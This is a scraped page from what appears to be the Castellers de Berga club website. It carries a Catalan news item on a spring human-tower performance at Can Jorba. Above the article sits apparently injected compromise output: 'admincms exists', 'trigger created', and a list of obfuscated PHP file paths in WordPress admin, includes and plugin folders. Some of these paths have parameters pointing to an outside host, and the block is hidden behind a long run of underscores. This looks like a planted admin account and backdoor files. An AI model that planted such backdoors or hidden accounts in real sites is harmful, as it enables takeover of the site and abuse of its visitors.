Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?meta https://castellersdeberga.cat/wp-admin/ms-upgrade-network-ajax-response-meta-ajax-core-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/meta-boxes-cron-ajax-response-ajax-wp-wp-wp-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/options-cron-core-stream-private-core-ajax-wp.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-stream-core-stream-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/the-events-calendar/the-events-calendar-meta-stream-wp-ajax-core-stream-meta.php https://castellersdeberga.cat/wp-includes/blocks/index-ajax-response-wp-stream.php https://castellersdeberga.cat/wp-includes/SimplePie/File-ajax-response-wp-wp.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Més castells de 7
 

Més castells de 7


Més castells de 7Diumenge 6 d’abril, temps primaveral i molta gent a Can Jorba, a Barcelona. Els berguedans actuaven amb dues colles històriques com són els Castellers de Barcelona i els Minyons de Terrassa. Fou una gran actuació de les 3 colles. Els de Terrassa van descarregar el seu 2 de 8 amb folre més matiner de la seva història, els Castellers de Barcelona 3 i 4 de 8 i els Castellers de Berga van descarregar el 3 i el 4 de 7, sumant així quatre castells de 7 en dues actuacions del poc que portem de temporada.
Davant d’un nombrós públic, els de la camisa blava van completar una actuació amb dos pilars de 4, el 4 de 7, el 3 de 7, el 5 de 6 i dos pilars de 4 més per tancar la jornada. Molt bones sensacions en aquesta arrencada de la temporada. Amb Setmana Santa entremig, les actuacions es rependran a Berga, l’1 de maig. I el 27 d’abril arriba la 1a Cursa d’Obstacles organitzada per la colla: LaContracorrent. Les inscripcions avancen a bon ritme.